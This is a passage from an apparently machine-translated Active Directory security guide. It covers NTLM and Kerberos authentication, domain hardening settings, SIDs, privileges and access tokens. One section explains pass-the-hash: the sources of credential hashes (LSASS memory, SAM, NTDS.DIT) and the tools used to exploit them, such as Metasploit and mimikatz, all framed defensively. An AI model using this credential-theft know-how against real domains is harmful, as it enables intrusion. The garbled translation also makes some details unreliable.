The process Lsass.exe NTHASH keep the user in memory after authentication. The client sends plaintext the user login to the server S.

3. The server S generates a random number of 16 bytes (called nonce or challenge) and sends it to the client.

4. The client encrypts the challenge with its password NTHASH format and sends the result (response) to the server S.

5. The server S sends the user login, the challenge and response (encrypted challenge with NTHASH of the user) to the domain controller.

6. The domain controller fetches the NTHASH user (it is in the attribute UnicodePwd
Active Directory user account) and encrypts the challenge with. The domain controller then compares the result with the response sent by the
server S. If it matches, the domain controller returns to the server S that the client C is authenticated.

7. The server S provides access to the client C.

For more information about the NTLM V2:


http://davenport.sourceforge.net/ntlm.html
https://www.sstic.org/media/SSTIC2007/SSTIC-
acts / Secrets_d_authentification_sous_Windows /
SSTIC2007-ArticleSecrets_d_authentification_sous_Windows-bordes.pdf
http://blogs.msdn.com/b/chiranth/archive/2013/09/21/ntlm-want-to-know-how-it-works.aspx

Msreport - Guillaume MATHIEU - All rights reserved


4.3 OVERVIEW V5 KDC PROTOCOL

In this section, we will see how a customer can access the C S servers by authenticating with the Kerberos protocol. The client C and the server
S are both members of the domain msreport.be.

The Kerberos protocol is the most secure protocol to authenticate a user (or computer) that wishes to access a resource (file sharing) on ​a
member server of an Active Directory domain. In a typical scenario, there are 3 players:

• The client C (the user in this case) who wants to authenticate to a server S.
• The S server (file server or the computer account of the server S) to ensure the authenticity of C.

• The trusted third party, the KDC (Active Directory domain controller).

Each domain controller has service Kerberos Key Distribution Center (KDC).
To access the file server S, the client C must use a domain name NetBIOS or DNS. This name should be added at the account of S computer
file server in the attribute
ServicePrincipalName in the following format:
<Service-type> / <NetBIOS or DNS name>: <port number> / <service name>
example: Host / SRV2012C

IF you specify an IP address to connect to a share, you can not authenticate with Kerberos as the attribute ServicePrincipalName ignores entries
with IP addresses. You must use the NTLM V2 authentication protocol for this scenario.

Kerberos authentication will consist of 6 exchanges networks to allow the client C to be authenticated by the server S. In the example below it is
assumed that the client has never yet authenticated to a controller domain. It must therefore seek TGT its domain controller and a session key S CK
( between the client C and the domain controller).

The KRB_AS_REQ and KRB_AS_REP messages


Client C logs on by entering their login and password. the DLL msgina.dll will transfer the login and user password process Lsass.exe ( service NETLOGON).

The client generates a hash of the password (NTHASH) and erases from memory the password in plain he entered. The process Lsass.exe NTHASH
keep the user in memory after authentication.

The customer will calculate its secret key K C which is derived from their password (at NTHASH format) as the encryption function used by
Kerberos ( des-cbc-md5, aes128-cts-HMACSHA1, aes256-cts-HMACSHA1, RC4-HMAC-MD5).

Msreport - Guillaume MATHIEU - All rights reserved


Lsass.exe ( NERTLOGON service) retain the TGT and key in memory. The key K C will allow the client to prove its identity to the domain
controller (pre-authentication) and allow to encrypt confidential data exchanges KRB_AS_REQ and KRB_AS_REP. The domain controller also
has the key K C client because the latter is stored in different forms (for the different algorithms used by Kerberos) at the attribute supplementalCredentials

User Account Customer C (see http://msdn.microsoft.com/en-us/library/cc245674.aspx ).

The KRB_TGS_REQ and KRB_TGS_REP messages:


These two applications will enable the client to retrieve the service ticket ( T S ) to connect to the file server S) and negotiate a session key
between the client C and the server S (S CS)
The client authenticates itself to the domain controller by encrypting an authenticator (contains customer name, date / time, sequence number)
with the key S CK and transmitting its TGT.

The KRB_AP_REQ and KRB_AP_REP messages:


Client C will authenticate with the server S by transmitting the service ticket T S and encrypting an authenticator with the S key CS.

The diagram below summarizes the 6 exchanges between the client C, the server S and the domain controller.

a TGT to the domain controller and a session key between the client and the KDC (S CK). The process

The exchanges are secure because the client C, the server S and the DC have secret keys. The domain controller knows the key K S and K C because
the keys are stored in the Active Directory in the attribute supplementalCredentials user accounts and computers in the domain. So it
can decrypt the messages of the client C and server S.

• The secret key of the client C ( K C) is derived from the password for the user account based on Kerberos encryption algorithm used ( des-cbc-md5-aes128
ctshmac-SHA1, aes256-ctshmac-SHA1, MD5 rc4-hmac )

• The secret key of the server S (K S) is derived from the computer account password as the service
Server ( file sharing) runs in the context of the account System either the computer account of the server S based on Kerberos encryption
algorithm used ( des-cbc-md5, aes128-cts-hmac-SHA1, aes256-cts-hmac-SHA1, MD5 rc4-hmac )

• The key K KDC is derived from the user account password KRBTGT based Kerberos encryption algorithm used ( des-cbc-md5,
aes128-cts-hmac-SHA1, aes256-cts-hmac-SHA1, MD5 rc4-hmac ). As this password replicates to all domain controllers (as any object),
the key K KDC is the same on all domain controllers.

Msreport - Guillaume MATHIEU - All rights reserved The request and KRB_AS_REQ the answer KRB_AS_REP will enable the client to request
Algorithm Salt Extra information
des-cbc-md5 Yes Protocol moderately secure.
aes128-cts-hmac-sha1 Yes highly secure encryption protocol (Windows novelty 7 / Windows 2008 R2).
aes256-cts-hmac-sha1 Yes
rc4-hmac-MD5 No Historic Protocol. Poorly secured. To disable.

encryption algorithms that Kerberos can use.

Key K C K S K KDC have a long life because:


By default the password of the computer accounts changes every 30 days. The life of passwords for user accounts is usually several tens of
days (depending passwords strategies). The account KRBTGT has not the option Password never expires. The attribute pwdLastSet shows that
the password has been set March 10, 2014 (when creating the domain). The fact that the password has expired (90 days in this configuration)
is not a problem because the account is not used for logging. Only the value of the password is important for Kerberos authentication.

Msreport - Guillaume MATHIEU - All rights reserved Parameter Network Security - configure encryption type allowed for Kerberos to define the
The authenticating includes the time and date. This allows Kerberos to prevent a replay attack by allowing default 5 minutes time difference
between the client C, the server S and the domain controller (KDC).

The standard Kerberos authentication protocol provides authentication but does not provide access control. Indeed, the model of the Windows
Policy Default Domain Policy.
access control is based on the SID ( Security Identifier). Microsoft has developed the CAP protocol that is an extension of the Kerberos protocol.
The CAP protocol to retrieve from the directory the SID of the user and the groups they belong to (including SID History) and store them in the
field Authorization Data TGT. Windows will then generate from the TGT information an access token that will be used to control access of each
process initiated by the user.

If you want to understand in detail the Kerberos protocol, I invite you to read the document Aurelian BORDES which is very comprehensive, well
done and served as the basis for writing this chapter on Kerberos.

http://www.ssi.gouv.fr/IMG/pdf/Aurelien_Bordes_-
_Secrets_d_authentification_episode_II_Kerberos_contre-attaque.pdf
http://blogs.msdn.com/b/openspecification/archive/2011/05/31/windows-configurations-for-kerberossupported-encryption-type.aspx

Msreport - Guillaume MATHIEU - All rights reserved The life of TGT ( 10 hours) and Session Ticket T S ( 10 hours) is configured at the Group
4.4 DELEGATION AUTHENTICATION KERBEROS

Kerberos delegation is a feature that allows a server A (which hosts a website for example) to authenticate taking the identity of a user B (Who
previously authenticated on server A) to access a resource on the server C.

When Kerberos delegation is enabled, the user sends a special TGT generated for him but with the attribute Forwarded to server B (known Forwarded
TGT).

Kerberos delegation is allowed:


1. If the computer account of the server hosting the service is configured for delegation. This is not the case by default. Only the computer
account for a domain controller is enabled for delegation for all services hosted on the domain controller.

2. If the user has authorized the delegation. This is the default case. The option Account is sensitive and can not be delegated will block the
delegation for specific user accounts. It must be enabled for administrative accounts.

Msreport - Guillaume MATHIEU - All rights reserved


Msreport - Guillaume MATHIEU - All rights reserved
4.5 THE GOOD PRACTICES TO IMPROVE THE SAFETY OF ACTIVE DIRECTORY DIRECTORY

4.5.1 B LOQUER CONNECTIONS LDAP S imple B IND WITHOUT SSL / TLS

An LDAP Simple Bind is to send the user login and password in the clear over the network. This method is not secure because a third party can
intercept login and user password with a network analyzer as Wireshark ( https://www.wireshark.org ). The screenshot below shows how a
potential attacker sees an LDAP Simple Bind connection on the network.

It is recommended "to generate a certificate based on the model Domain Controller on all domain controllers. It will then be possible to perform
an LDAP Simple Bind secured using SSL / TLS connection.

4.5.2 CTIVER SIGNING LDAP TRAFFIC

In many of my clients, the following warning message appears in the


Observers of events:

Log Name: Directory Service


Source: Microsoft-Windows-ActiveDirectory_DomainService
Dated: 12/11/2014 8:42:38
Event ID: 2886
Task Category: LDAP Interface Level:
Warning
Keywords: Classic
user: Anonymous Logon
Computer: TPODC1.tpo.net
Description:
The security of this directory server Can Be Significantly enhanced by Configuring the server to reject SASL (Negotiate, Kerberos, NTLM,
or Digest) LDAP binds That do not request signing (integrity verification) and LDAP single binds That are Performed was cleartext (not
-SSL / TLSencrypted) connection. Even if no customers are using Such binds, Configuring the server to reject em will Improve the security
of this server.

Some customers May be Relying Currently we unsigned SASL LDAP binds or binds over a single nonSSL / TLS connection, and will stop
working if this configuration change is made. To assist in Identifying thesis customers Such binds Occur if this directory server will log a
summary event once every 24 hours indicating indication How Many Such binds occurred. You are Encouraged to configure Those
customers to not use Such binds. Once no such events are year Observed for extended period, it is recommended That You configure the
server to reject Such binds.

You can enable additional logging to log an event Each time a customer Makes Such a bind, Including Data-qui customer made the bind.
To do so, please raise the setting for the "LDAP Interface Events" event logging category to level 2 or Higher.

Msreport - Guillaume MATHIEU - All rights reserved


The use of TLS / SSL connection (requires a certificate) is used to sign LDAP traffic. This is why LDAP signing is not necessary for an LDAP
Simple Bind with SSL / TLS.

To enable this change:

1. Edit Group Policy Default Domain Controller Policy. Go in Computer


Configuration \ Windows Settings \ Security Settings \ Local Policies \ Security Options. Configure the setting Domain controller - LDAP server
signing requirements sure Require signing.

2. Edit Group Policy Default Domain Policy. Go in Computer Configuration \ Windows Settings \ Security Settings \ Local Policies \ Security
Options. Configure the setting Network security: LDAP client signing requirements sure Require signing.

enable LDAP signing to block the LDAP Simple Bind commands without SSL / TLS and to block the LDAP SASL Bind orders without signature.

To verify that the new setting is in production, launch LDP.EXE utility. Click on Connection | Connect. Enter the domain controller IP. Do not
check the SSL checkbox. The directory sends this information:

supportedSASLMechanisms (4): GSSAPI; GSS-SPNEGO; EXTERNAL; DIGEST-MD5;


Then go to Connection | Bind.
Enter your user name and select the check box Simple bind.

Msreport - Guillaume MATHIEU - All rights reserved Article Microsoft http://support.microsoft.com/kb/935834/en-us explains that it is possible to
should appear:
Error 0x2028. A more secure authentication method is required for this server.
Indeed, LDAP Simple Bind controls are no longer allowed without SSL / TLS.

Install Active Directory Certificate Services ( see attached procedure) on a member server. Create an enterprise root certification authority (1 a
third certification authority is sufficient for demonstration).

By default Windows 2012 R2 domain controllers are configured to obtain a type certificate Domain controller via the autoenrollment. To force the
generation of the certificate, type the command
gpupdate / force on the domain controller Windows 2012 R2. You now have a type certificate Domain Controller.

Now you can test an LDAP SIMPLE BIND with SSL / TLS. Enter the domain controller DNS name and
check the SSL checkbox.

You should get the following result:


res = Ldap_simple_bind_s (bd, 'msreport \ administrator' <unavailable>); // v.3 Authenticated as'
MSREPORT \ Administrator.

click on View | Tree. Add the path LDAP domain (DC = msreport, dc = be in this example).

Msreport - Guillaume MATHIEU - All rights reserved The following error


Directory.

Enable LDAP signing only after having validated on model and after identifying all applications that perform authentication requests LDAP
Simple Bind.

To identify the applications that perform LDAP Simple Bind, you have to filter the event log on the ID 2887 as stated in Article http://support.microsoft.com/kb/935834/
.

4.5.3 D ESACTIVER PROTOCOLS OF NTLM AUTHENTICATION

Active Directory allows users to authenticate with the LM protocol, NTLM V1, V2 NTLM and Kerberos (we disregard the DIGEST protocol
requires special configuration unsafe and not activated). If you only have machines running Windows 7 and Windows 2008 R2, you can disable
LM and NTLM. Only NTLM authentication protocol Kerberos and V2 will be allowed.

It is also possible to prohibit the NTLM V2 protocol but that requires a very thorough study phase (see later in this document).

The use of protocols LM, NTLM V1 and V2 is controlled by NTLM Group Policy
Network security: LAN Manager authentication level.
Start gpmc.msc console and edit the Default Domain Policy. Go in Computer Configuration | Policies | Windows Settings | Security Settings |
Security Options.
Configure the setting Network security: LAN Manager authentication level sure Send NTLMv2 response only. Refuse LM & NTLM.

Do the same action at the Default Domain Controller Policy ( to avoid any potential conflict).

With this setting, protocols LM and NTLM V1 are disabled, allowing to increase the security level of the directory.

Msreport - Guillaume MATHIEU - All rights reserved You can now browse the Active
NTLM or LM protocols:
• File servers / NAS that rely on SAMBA must be at least version 3.0 as stated on the website http://www.samba.org/samba/history/ .

• You must have Service Pack 4 for Windows NT4 workstations.

A study of the impact of disabling LM & NTLM should be performed before setting this parameter to the production environment.

It is possible to go further and also disable NTLM V2 protocol. This action is strongly discouraged and requires a very thorough analysis
of the impacts at the application level . It can be applied in research environments with very high security requirements.

To disable NTLM V2 (and all variants such as LM and NTLM)


Launch console gpmc.msc and edit Default Domain Policy. Go in Computer Configuration | Policies | Windows Settings | Security Settings |
Security Options.
Configure the setting Network security: Restrict NTLM: NTLM authentication in this domain the value Deny all.

In this mode, all NTLM traffic is prohibited except for machinery added to the GPO setting Network security: Restrict NTLM: Add server
exceptions for NTLM authentication in this domain. Logon with an account of the local SAM database on a Windows machine is always in NTLM
too.

Msreport - Guillaume MATHIEU - All rights reserved Examples of applications requiring


ServicePrincipalName CHBAADMT the computer account must contain the following entry:
MSSQLSvc / CHBAADMT.chidf75.net: ADMT.

To view the ServicePrincipalName attribute, configure console Active Directory Users and Computers display mode Advanced Features. Then go
to the tab attribute Editor and select ServicePrincipalName. To add or remove an SPN, use the tool Setspn.exe.

CHBAADMT ADMT instance SQL Server 2008 R2. To authenticate to the SQL Server 2008 R2, the attribute

To disable NTLM V2, it is necessary to check whether all applications that authenticate with Active Directory user accounts and Kerberos
support if you have created all required ServicePrincipalName.

If the NTLM protocol is disabled, access to an application via its IP is no longer possible. The error message The network name can not be
found.

To help you in this task, it is possible to activate a GPO setting that will create a log with all applications / machines that use NTLM to log level

Applications and Services Log / Microsoft / Windows / NTLM. This setting requires the availability of Windows 2008 R2 domain controller.

I invite you to read these two articles for more information on how to block LM and NTLM V1 authentication, NTLM V2.
all the servers and enterprise applications. It will be necessary to create an SPN for all DNS alias. In the example below, the server has a
http://blogs.technet.com/b/askds/archive/2009/10/08/ntlm-blocking-and-you-application-analysis-andauditing-methodologies-in-windows-7.aspx

http://technet.microsoft.com/en-us/library/jj865680(v=ws.10).aspx
http://technet.microsoft.com/en-us/library/jj865671(v=ws.10) .aspx

Msreport - Guillaume MATHIEU - All rights reserved The use of Kerberos authentication requires a ServicePrincipalName be created to identify
4.5.4 C Iles ALGORITHM ENCRYPTION K ERBEROS

If you have only machines running Windows 7 / Windows 2008 R2 and later versions, you can only allow encryption protocols AES128_HMAC_SH1
and
AES256_HMAC_SH1SH1 for Kerberos. The encryption algorithms AES128_HMAC_SH1 and
AES256_HMAC_SH1 are indeed
more secure than DES_CBC_MD5 or RC4_HMAC_MD5 ( the less secure protocol).

To enable this setting:


Start gpmc.msc console and edit the Default Domain Policy. Go in Computer Configuration | Policies | Windows Settings | Security Settings |
Security Options. At the parameter Network Security: Configure Encryption
Types allowed for Kerberos, only check the
boxes AES128_HMAC_SH1 and AES256_HMAC_SH1. Do the same at the Default Domain Controller Policy.

This setting affects all user accounts and all computers in the domain accounts. It overwrites the settings at the user and computer accounts as
explained in the following Microsoft:

http://blogs.msdn.com/b/openspecification/archive/2011/05/31/windows-configurations-for-kerberossupported-encryption-type.aspx

Msreport - Guillaume MATHIEU - All rights reserved


This setting can cause problems with some applications. It will be necessary to validate the proper operation of your applications after
implementation. I invite you to read the articles below that speak:

http://technet.microsoft.com/en-us/library/dd560670(v=WS.10).aspx
http://windowsitpro.com/security/q-can-default-encryption-types-kerberos-authentication-protocoluses-windows-7-and-windows-

https://dirteam.com/sander/2014/07/15/security-thoughts-leveraging-ntlm-hashes-using-kerberos-rc4hmac-encryption-aka-aorato-s-active-directory-vulnerability/

Msreport - Guillaume MATHIEU - All rights reserved


4.5.5 C Iles THE TIME SYNC

The Kerberos protocol supports a maximum of 5 minutes time difference (configurable in Kerberos strategies Default Domain Policy).

It is therefore vital to set time synchronization policy. The latter is done (default) through service W32Time. On domain member machines, the
service serves customer
NTP.

The domain member machines are synchronized to one of the controllers of their field. The entrance
of register
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ W32Time \ Parameters \ Type must
have as value NT5DS.

On domain controllers, the W32Time service plays both the role of NTP client and NTP server. Domain controllers must synchronize their time
from the domain controller with the PDC Emulator role in their field or with a controller of the parent or root domain.

At the forest root domain, the domain controllers must be synchronized to the Emulator PDC of the root domain.

In turn this server (the root domain controller with the PDC Emulator role) will have to be synchronized with a reliable time source. registry entry
This requires spending Type the value NTP and define an NTP server as time.windows.com.

To do this type the following command:


w32tm / config / computer: << >> /manualpeerlist:time.windows.com PDC-FQDN / syncfromflags: manual / update

We can see that the entry type register has been set to the value NTP ( instead of NT5DS ).

What if all your domain controllers are virtual machines?


All server virtualization (such as Hyper-V, VMware ESX ...) must synchronize manually and directly at the same time server that the PDC
emulator of the forest root domain. If you have Hyper-V, we must apply the same command to the PDC Emulator.

Msreport - Guillaume MATHIEU - All rights reserved


w32tm / config / computer: << >> HyperV /manualpeerlist:time.windows.com / syncfromflags: manual / update

For other virtual machines (including domain controllers), it remains on the standard setting shown above.

http://blogs.technet.com/b/nepapfe/archive/2013/03/01/it-s-simple-time-configuration-in-activedirectory.aspx

http://technet.microsoft.com/fr-fr/library/dd723673(v=ws.10).aspx

4.5.6 I NTERDIRE DELEGATION K ERBEROS FOR ACCOUNTS OF DIRECTORS

When Kerberos delegation is enabled, the user A sends a TGT Forwarded (TGT user) to server B. This behavior is very risky with users
accounts with important privileges because an attacker can do elevation of privilege if he can compromise the server B.

A good practice is to set the option Account is sensitive and can not be delegated all user accounts with administrative privileges on the Active
Directory.

Msreport - Guillaume MATHIEU - All rights reserved


4.6 ELEVATION OF PRIVILEGE WITH TECHNOLOGY NTLM PASS THE HASH

In the example below it is assumed that the LMHash disabled. The user is already authenticated with the domain controller using the NTLM
protocol.

Once the user is authenticated on the station (local logon), how he manages to access resources on other machines without having to
re-authenticate every time (without application login / password) ? The process Lsass.exe will generate a HASH from the user's password (the
NTHASH) and store it in memory after the logon performed.

To access network resources, the user makes a network logon. With NTLM, the network logon only requires that the machine has the NTHASH
(the hash of the user's password) to encrypt the challenge sent by the server.

Windows therefore asks no login / password because it already has this information in memory.

4.6.1 C NDERSTANDING ATTACK NTLM P ASS T HE H ASH

Type attacks Pass-the-hash are to be authenticated, rather than using the user's password but its footprint (the NTHASH). The attacker can
recover NTHASH the user in several ways:

• By analyzing the process memory Lsass.exe.


• Via registry entries HKEY_LOCAL_MACHINE \ SECURITY.
• By analyzing the contents of the SAM database ( HKEY_LOCAL_MACHINE \ SAM). This attack works for local accounts of the SAM
database.
• By analyzing the contents of the file NTDS.DIT ​(Active Directory)

As it is not always possible (even with rainbow tables) to recover the password in the clear from NTHASH, the attacker will simulate the
operation of a network logon with NTLM. Details of this exchange is presented below:

1. The attacker sends the clear text user login to the server S.

2. The server S generates a random number of 16 bytes (called nonce or challenge) and sends it to the client.

3. The attacker encrypts the challenge with the password to the user NTHASH format he has recovered (the answer) and sends it to the server
S.

5. The server S sends the user login, the challenge and response (encrypted challenge with NTHASH of the user) to the domain controller.

6. The domain controller fetches the NTHASH (user password in Active Directory) and encrypts the challenge with. The domain controller then
compares the result with the response sent by the server S. If it matches, the domain controller returns to the server S that the authentication is
correct.

7. The server S provides access to the attacker.

The principle is similar with the Kerberos authentication protocol (attack Pass The Key)
If an attacker manages to extract the key K C the user, it can request a TGT without knowing the user's password. This attack requires modifying
the contents of the memory process Lsass.exe ( service Netlogon).

The attacker must then enter the command klist purge to remove the existing ticket. Once the attacker will access a new network resource, a
new ticket TGT will be generated.

Msreport - Guillaume MATHIEU - All rights reserved


4.6.2 A PROCEDURE FOR ATTACK NTLM P ASS T HE H ASH

The main tools to attack NTLM Pass the Hash running Windows 7 are:
• PSEXEC Metasploit module the tool smbpass toggles the Hash to another machine.
• Tenable smbshell: toggles the Hash of a machine.

A stepper is available in the following article: http://www.ldap389.info/2012/11/16/test-d-intrusionactive-directory-pentest/

4.6.3 S E PROTECT AGAINST ATTACKS NTLM P ASS T HE H ASH

This attack requires the following prerequisites:


• Get administrator privileges on the compromised machine.
• Have the privilege Debug programs.

To limit the risk of attack Pass-The-Hash it is necessary :


• Prevent users with important privileges to log on local workstations.

• Avoid services or applications running with the account System.


• Avoid using scheduled tasks with the account System.
• Avoid that users are local administrators of their (s) machine (s) and / or block the privilege Debug programs.

• Avoid the local administrator password is the same on all workstations and servers.

• Deploying updates to security on workstations and servers.


• Disable NTLM and all these variants (LM, NTLM and NTLM V2). As seen above is very complex to implement.

4.7 PROTECT AGAINST ATTACKS BY THE KERBEROS TICKET WITH A TOOL AS MIMIKATZ

See paragraph Audit the security of your directory of this document.


http://blog.gentilkiwi.com/mimikatz
https://experiences.microsoft.fr/Video/avec-laps-metsys-premunit-un-si-dattaques-par-elevation-deprivileges/fd1a804d-c21d-4bbe-97d7-1697364fe5b5#EDHCoWhxb

Msreport - Guillaume MATHIEU - All rights reserved


5 THE MANAGEMENT SIGN WITH ACTIVE DIRECTORY
Access management in the world Microsoft Windows based on the following elements:
• The SID (Security Identifier)
• The permissions (permissions NTFS, share permissions, permissions on the registry entries, permissions on Active Directory objects ...).

• Systems privileges.
• The process.
• Access tokens.
We will see in this part how the processes and Windows services.

5.1 THE SID

A SID is a unique security identifier. User accounts, groups and computer accounts in Active Directory have a SID. User accounts and SAM basic
groups (local account database) also have a SID.

In Microsoft environments, access control is done using access tokens. A access token contains inter alia the SID the account of the user and the
SID each group member which is directly or indirectly the user (group member of another group). A SID is divided into 3 portions (example S-1-5-21-1712426984-161

• S-1-5: indicates that the SID was generated by Windows Security_NT_Authority.


• 21-1712426984-1618080182-1209977580: represents the unique identifier of the field.
• 1109: This is the unique identifier of the resource (a user account in our case).

The SID is stored at the attribute objectSid which is managed by the system. An administrator can not change the value of this attribute or affect SID
a user account that has been deleted by another user account (hence the problem of accidental deletion of account).

When giving permissions to the user melanie.mathieu on a folder called Sharing


(tab Security) it's the SID this account that has permissions in the NTFS file system. Windows resolves the SID in a name in the tab Security for
user comfort. If you delete the user account melanie.mathieu and which are closed / open session again (restart Windows 2012 R2), the old user
account appears as a SID.

Msreport - Guillaume MATHIEU - All rights reserved


Some SID are displayed in the following form: S-1-5-32-544, S-1-5-32-545. This is the SID group default SAM base or entities known safety ( Well-known
Security Main)
as Authenticated Users.

The (SID attribute objectSid) should not be confused with the (GUID objectGuid) that it is the unique identifier of an object in the Active Directory
forest.

When a position is migrated from one domain (NT4, Samba or Active Directory) to another domain with a migration tool as Microsoft ADMT or Dell
Migration Manager for Active Directory the
SID the user account of the former estate (source domain) can be copied into the attribute
).
SIDHistory the user account of the new domain (target area). This enables migration between two areas smoothly. We will see later in this
document that the use of SID History ( attribute SidHistory) poses security problems. For more information on migration with Microsoft ADMT, visit
the following links:

http://msreport.free.fr/?p=443
http://www.microsoft.com/en-US/download/details.aspx?id=19188

5.2 PERMISSIONS

NTFS permissions (Security tab in folder / file properties) are based on 13 permissions. The most important is permission Take ownership . It can
become the owner of a file / folder. Excluding the owner of a file / folder can change permissions and give access to files / folders.

Directory Users and Computers and Active Directory Administrative Center or PsGetSid tool ( http://technet.microsoft.com/en-us/sysinternals/bb897417.aspx

Msreport - Guillaume MATHIEU - All rights reserved To view the SID a user, use the console ADSIEDIT.MSC, the attribute editor in brackets Active
The permissions on the registry entries are based on 11 permissions. The most important is permission Write owner. It can become the owner of
the key or the registry entry. The owner has the right to change permissions.

The permissions on Active Directory objects are much more complex. I invite you to refer to Part 2 of this document " Good practices to delegate
administration of the Active Directory directory " for more information.

NTFS permissions, the permissions on the registry and permissions in the Active Directory has a mechanism called Heritage allowing the
permissions of a parent container (folder, registry key or an OR for example) to child objects (files, registry entries, account user / group).
Inheritance can be disabled if required.

If given on a domain controller to a standard user (not a member of the administrative groups) permission Full Control all files of all disk
volumes, all the registry entries and all objects of all partitions of Active Directory, the user will have rights equivalent to almost a local
administrator of the machine, an administrator domain, an administrator of the company and a schema administrator.

However, it may still not log on to a domain controller. This is related to the fact that the user does not have the
privilege Allow Log on locally.

What will happen if you delete the user account who the owner of a file and he was the only one with rights to the file?

Microsoft has managed this case and created for it the privilege of Directors Take ownership of files or other objects. We will see that this
privilege allows a default local administrator to become the owner of a file (among others) and thus change the permissions on this file.

Msreport - Guillaume MATHIEU - All rights reserved


5.3 PRIVILEGES

Privileges are the rights given to a user as being able to bypass NTFS permissions ( Take ownership of files or other objects) or access the
memory used by all processes ( Debug programs) or log locally ( Allow Log on locally).

Privileges are at number 44 on a Windows Server 2012 R2 machine and are configured in the form of GPO settings in Computer Configuration |
Policies | Windows Settings | Security Settings | Local Policies | User Rights Assignment.

The Microsoft article below presents each of these parameters in detail:


http://technet.microsoft.com/en-us/library/db585464-a2be-41b1-b781e9845182f4b6(v=ws.10)#BKMK_2
.

Administrator accounts and System have all the rights on a Windows machine because they have access Total control on almost all system
components (files, registry entries ...) and almost all privileges. Article Microsoft http://technet.microsoft.com/en-us/library/bb457125.aspx explains
the concept of details in privilege on a Windows system.

The privileges with the most significant impacts on the security of Active Directory are described below.

• Act as share of the operating system (SeTcbPrivilege) This privilege allows you to override certain controls during logon. It is reserved
for expected process open user sessions. Winlogon.exe and seclogon services need this privilege. It is recommended that this person
privilege. By default, it is not assigned to anyone.

• Add workstations to domain (SeMachineAccountPrivilege) Adds a machine in the field (up to 10 workstations default). By default this
privilege is given to groups Authenticated Users. If you do not want a standard user to join a machine to the domain, this privilege must be
reconfigured.

• Back up files and directories (SeBackupPrivilege) saves data even without permissions. This privilege is very critical and is given to
groups Backup Operators and Server Operators. It is for this reason that content administrators do not need to be a member of these two
groups.

• Create a token object (secreatetokenprivilege) this privilege can create an access token. It is not given to any user account and it must
remain so.

• Debug programs (SeDebugPrivilege) This right allows a user to open any process to access its memory and copy resources. It is this
privilege based tool INCOGNITO.EXE ( presented later in this document). Normally, no production service should not be based on that
privilege, it is generally used for application development and advanced troubleshooting. By default, the Administrators have this privilege.
Ideally, no one should have this privilege. It should activate on demand or create a dedicated security group.

Msreport - Guillaume MATHIEU - All rights reserved


• Enable computer and user accounts to be trusted for delegation (seenabledelegationprivilege) defines who can authorize
or not a user / computer to make Kerberos delegation.

• Generate security audits (SeAuditPrivilege) determines who can generate events in the security log. This privilege is important because
there is a group policy that blocks the login when the newspaper Security is full (except for administrators). An attacker could generate
thousands of audit events for the sole purpose of blocking the login for standard users.

• Impersonate a customer after-authentication (SeImpersonatePrivilege) allows a process to assume the identity of a user that would
authenticated. We must study the relevance to leave this privilege to an administrator. By default, the Administrators, SERVICE, LOCAL
SERVICE and
NETWORK SERVICE have this privilege.

• Manage auditing and security log (SeSecurityPrivilege) determines who can view and clear the log Security. By default administrators
have this right. Only people in charge of monitoring actions on the directory (audits and controls) should have the right to clear the log Security
on the domain controllers.

• Restore files and directories (SeRestorePrivilege) to determine the user accounts that can override permissions during restore
operations. The user has an equivalent NTFS permissions Traverse Folder / Execute file and Write.

• Take ownership of files or other objects (SeTakeOwnershipPrivilege) allows to become owner of a file, registry key (among others)
and thus redefine the NTFS permissions on the file or registry key.

There are also privileges that allow or prohibit an interactive logon (logon locally or via remote desktop) or as a scheduled task. These privileges
must be configured carefully.

Msreport - Guillaume MATHIEU - All rights reserved


5.4 PROCESSES

A process is spawned for each executable that starts on the Windows system (service or application). You can see the list of processes in the Task
Manager ( tab Details Windows 2012 R2). You can customize the column display for viewing including the executable that generated the
process, memory consumption, the context of the process (the user account, the security entity, the MSA or GMSA running the process).

5.5 SERVICES

To view and configure services, you can use the MMC SERVICES.MSC or edit the registry entries under HKEY_LOCAL_MACHINE \ SYSTEM \
CurrentControlSet \ Services.
Services are executables that start automatically or manually in the context of a user account. Services can run in the context of a user account,
a security principal (System, Local System, Network Service ...), an MSA or GMSA. The NETLOGON service runs with the account System ( Local
System account) and runs the executable c: \ windows \ system32 \ lsass.exe.

Some services perform specific actions if the service stops incorrectly. The service Remote Procedure Call (RPC) reboots the machine for
improper stop the RPC service. The virus BLASTER generated a service crash CPP using a security flaw described in the article http://support.microsoft.com/kb/8269
the sole purpose of forcing a reboot.

Msreport - Guillaume MATHIEU - All rights reserved


HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Svchost

services). All service groups managed by SVCHOST are in the following registry key:

All services of the same group services SVCHOST run in the same process ( c: \ windows \ system32 \ svchost -k
nom_du_group_services_Svchost) and thus run in the context of the same account. We can see this operation in the Windows Task Manager
(Processes tab).

Windows services. Multiple instances of Svchost.exe can run simultaneously. Each instance can run one or more services (said group

Msreport - Guillaume MATHIEU - All rights reserved Windows uses SVCHOST (C: \ windows \ system32 \ svchost.exe) to charge certain
For more information on SVCHOST: http://support.microsoft.com/kb/314056/fr

Since Windows Server 2008 R1, Microsoft has included a mechanism called level Windows Service Hardening to better protect services against
attacks. This feature requires the Windows Firewall service is started . This service should not be stopped. To turn off the Windows firewall
without stopping the Windows Firewall Service, configure 3 profiles firewall Off.

Msreport - Guillaume MATHIEU - All rights reserved Tab Services of Task Manager lets see the different service groups SVCHOST.
• None: the service does not have a SID.
• Unrestricted: the service will have a SID.
• Restricted: the service will have a SID and a restricted token (same principle as the UAC). Each department may then have a SID which
will allow to give rights to the file system, Windows registry entries to this service.

Examples with the DHCP Client service:

defined in parameter SidType a service that can have 3 values:

I invite you to read these two articles for more information on functionality Windows Service Hardening.

Msreport - Guillaume MATHIEU - All rights reserved With functionality Windows Service Hardening, each service can now have a SID. This is
http://blogs.technet.com/b/askperf/archive/2008/02/03/ws2008-windows-service-hardening.aspx
http://blogs.msdn.com/b/sql_protocols/archive/2009/09
/21/connection-from-a-windows-service-couldbe-blocked-by-firewall-even-if-firewall-is-disabled.aspx

5.6 THE ACCESS FEES (ACCESS TOKEN)

A access token (Token Access) is generated by the process Lsass.exe ( service Netlogon) Once the user is authenticated with protocol Kerberos or
NTLM. A access token contains:
• The SID and the SID History Account User
• The SID and SID History of all groups in the domain that the user is a member directly and indirectly (group member of another group ...).

• The SID all based groups SAT Local which the user belongs (as
Administrators)
• The list of privileges (as SeDebugPrivilege) available to the user on the local machine.

